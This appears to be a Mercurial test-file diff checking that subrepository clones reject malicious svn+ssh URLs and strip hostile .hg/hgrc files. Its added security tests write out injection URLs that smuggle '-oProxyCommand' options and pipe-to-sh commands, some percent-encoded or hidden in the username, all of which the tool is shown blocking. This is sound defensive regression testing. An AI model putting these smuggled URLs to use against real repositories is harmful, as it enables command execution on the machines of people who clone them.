598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
599 $ cd ..
599 $ cd ..
600
600
601 Test sanitizing ".hg/hgrc" in subrepo
601 Test sanitizing ".hg/hgrc" in subrepo
602
602
603 $ cd sub/t
603 $ cd sub/t
604 $ hg update -q -C tip
604 $ hg update -q -C tip
605 $ cd s
605 $ cd s
606 $ mkdir .hg
606 $ mkdir .hg
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
608 $ mkdir -p sub/.hg
608 $ mkdir -p sub/.hg
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
610 $ svn add .hg sub
610 $ svn add .hg sub
611 A .hg
611 A .hg
612 A .hg/hgrc (glob)
612 A .hg/hgrc (glob)
613 A sub
613 A sub
614 A sub/.hg (glob)
614 A sub/.hg (glob)
615 A sub/.hg/hgrc (glob)
615 A sub/.hg/hgrc (glob)
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
617 $ svn up -q
617 $ svn up -q
618 $ cd ..
618 $ cd ..
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
620 $ grep ' s$' .hgsubstate
620 $ grep ' s$' .hgsubstate
621 16 s
621 16 s
622 $ cd ..
622 $ cd ..
623
623
624 $ hg -R tc pull -u -q 2>&1 | sort
624 $ hg -R tc pull -u -q 2>&1 | sort
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
627 $ cd tc
627 $ cd tc
628 $ grep ' s$' .hgsubstate
628 $ grep ' s$' .hgsubstate
629 16 s
629 16 s
630 $ test -f s/.hg/hgrc
630 $ test -f s/.hg/hgrc
631 [1]
631 [1]
632 $ test -f s/sub/.hg/hgrc
632 $ test -f s/sub/.hg/hgrc
633 [1]
633 [1]
634
634
635 Test that sanitizing is omitted in meta data area:
635 Test that sanitizing is omitted in meta data area:
636
636
637 $ mkdir s/.svn/.hg
637 $ mkdir s/.svn/.hg
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
639 $ hg update -q -C '.^1'
639 $ hg update -q -C '.^1'
640
640
641 $ cd ../..
641 $ cd ../..
642
643 SEC: test for ssh exploit
644
645 $ hg init ssh-vuln
646 $ cd ssh-vuln
647 $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub
648 $ svn co --quiet "$SVNREPOURL"/src s
649 $ hg add .hgsub
650 $ hg ci -m1
651 $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub
652 $ hg ci -m2
653 $ cd ..
654 $ hg clone ssh-vuln ssh-vuln-clone
655 updating to branch default
656 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
657 [255]
658
659 also check that a percent encoded '-' (%2D) doesn't work
660
661 $ cd ssh-vuln
662 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub
663 $ hg ci -m3
664 $ cd ..
665 $ rm -r ssh-vuln-clone
666 $ hg clone ssh-vuln ssh-vuln-clone
667 updating to branch default
668 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
669 [255]
670
671 also check for a pipe
672
673 $ cd ssh-vuln
674 $ echo "s = [svn]svn+ssh://fakehost|sh%20nested" > .hgsub
675 $ hg ci -m3
676 $ cd ..
677 $ rm -r ssh-vuln-clone
678 $ hg clone ssh-vuln ssh-vuln-clone
679 updating to branch default
680 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepository "s")
681 [255]
682
683 also check that a percent encoded '|' (%7C) doesn't work
684
685 $ cd ssh-vuln
686 $ echo "s = [svn]svn+ssh://fakehost%7Csh%20nested" > .hgsub
687 $ hg ci -m3
688 $ cd ..
689 $ rm -r ssh-vuln-clone
690 $ hg clone ssh-vuln ssh-vuln-clone
691 updating to branch default
692 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepository "s")
693 [255]
694
695 also check that hiding the attack in the username doesn't work:
696
697 $ cd ssh-vuln
698 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub
699 $ hg ci -m3
700 $ cd ..
701 $ rm -r ssh-vuln-clone
702 $ hg clone ssh-vuln ssh-vuln-clone
703 updating to branch default
704 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepository "s")
705 [255]
General Comments 0
You need to be logged in to leave comments. Login now